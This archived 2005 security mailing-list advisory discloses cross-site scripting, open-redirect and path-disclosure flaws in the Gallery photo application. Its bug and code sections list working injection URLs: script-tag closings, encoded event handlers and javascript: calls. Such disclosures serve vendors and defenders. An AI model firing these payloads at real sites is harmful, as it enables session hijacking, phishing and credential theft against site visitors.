[VulnWatch] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/17/05

  • Next message: Madelman: "phpGiftReq SQL Injection" 
    Date: Mon, 17 Jan 2005 22:34:43 +0200
To: Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, "securitytracker.com" <bugs@securitytracker.com>, news@securiteam.com, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Gallery
    Vendors: http://gallery.sourceforge.net
    Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
    Platforms: Windows
    Bug: Cross Site Scripting Vulnerability
    Exploitation: Remote With Browser
    Date: 17 Jan 2005
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Gallery is open to Cross Site Scripting vulnerability, allowing a remote
    attacker to inject and execute scripts on the user’s machine while visiting
    a remote gallery.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
    ‘index’ field. The injection can be done using the classical tag closing:
    "><script>alert()</script>

    For Example:
    http:// host>/gallery/add_comment.php?set_albumName=Eros&index=1">
    <script>alert()</script>

    Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
    in ALL the fields. The ‘slideshow_low.php’ contains the following form
    fields:
    set_albumName
    slide_index
    slide_full
    slide_loop
    slide_pause
    slide_dir

    The injection can be done using the classical tag closing:
    "><script>alert()</script>

    For Example:
    http:// host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_
    index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl
    ide_dir=1

    Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
    ‘username’ field. The injection can be done using hex encoded tag closing
    and an HTML event:
    %22%20onactivate%3D"alert%28%29"

    For Example:
    http://
    host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"

    Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
    ‘username’ field.
    The injection can be done using hex encoded tag closing and an HTML event:
    %22%20onactivate%3D"alert%28%29"
    http:// host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20
    onactivate%3Dalert%28%29%3e
    This version of Gallery also has an open redirection, which is a security
    risk because
    an attacker can send someone a link with a redirection to his evil host name
    or to cause
    the user to commit an attack or waste a target’s resources.

    For Example:
    http:// host>/gallery/do_command.php?set_fullOnly=on&return=<escape
    encoded evil
    host name>&cmd= All the vulnerabilities described above can be used to
    remotely call
    a JavaScript file The injected JavaScript code is responsible for:
    Automatic launching of malicious code (remote compromise by I.E exploits).
    Identity theft using a spoofed re-login window (only for galleries with
    login)

    Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
    ‘g2_form[subject]’
    field. The injection can be done using an inline javascript protocol call:
    javascript:alert()

    For Example:
    http:// host>/g2/main.php?g2_controller=comment:AddComment&g2
    _form[formName]=AddComment&g2_itemId=<valid
    item>&g2_form[subject]=[img]javascript:alert
    ()[/img]&g2_form[action][preview]=preview

    Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
    ‘g2_subView’ parameter. It is possible the replace any valid subView value
    such as: comment
    :ShowComments with the admin value: core:UserAdmin. This causes the gallery
    to wait 30 seconds
    and then print out the Full Path of the gallery on the server.

    For Example:
    http:// host>/g2/main.php?g2_return= http://
    host>/main.php%3Fg2_view%3Dcore
    %3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
    id such as:
    be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&amp;g2_subView=core
    :UserAdmin

    Then the following data will be printed out to the attacker:
    Fatal error: Maximum execution time of 30 seconds exceeded in
    /mnt/1/<name>/www/<host>/g2/
    modules/core/UserAdmin.inc on line 55

    Second Time
    Fatal error: Maximum execution time of 30 seconds exceeded in
    /mnt/1/<name>/www/<host>/g2/
    modules/core/classes/GalleryUtilities.class on line 596

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Gallery v1.3.4-pl1
    http://>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al
    ert()</script>
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s
    cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
    http://>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

    Gallery v1.4.4-pl2
    http://>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
    /%20onactivate%3Dalert%28%29%3e<plaintext>
    http://>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
    .google.com&cmd=

    Gallery v2.0 Alpha

    1) http:// host>/g2/main.php?g2_controller=comment:AddComment&g2
     _form[formName]=AddComment&g2_itemId=<valid
    item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
    ]=preview

    2)
    http://>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
    3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
    43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
    p;g2_view=core:UserAdmin&amp;g2_subView=core:UserAdmin

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

    ---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
  • Next message: Madelman: "phpGiftReq SQL Injection"

    Relevant Pages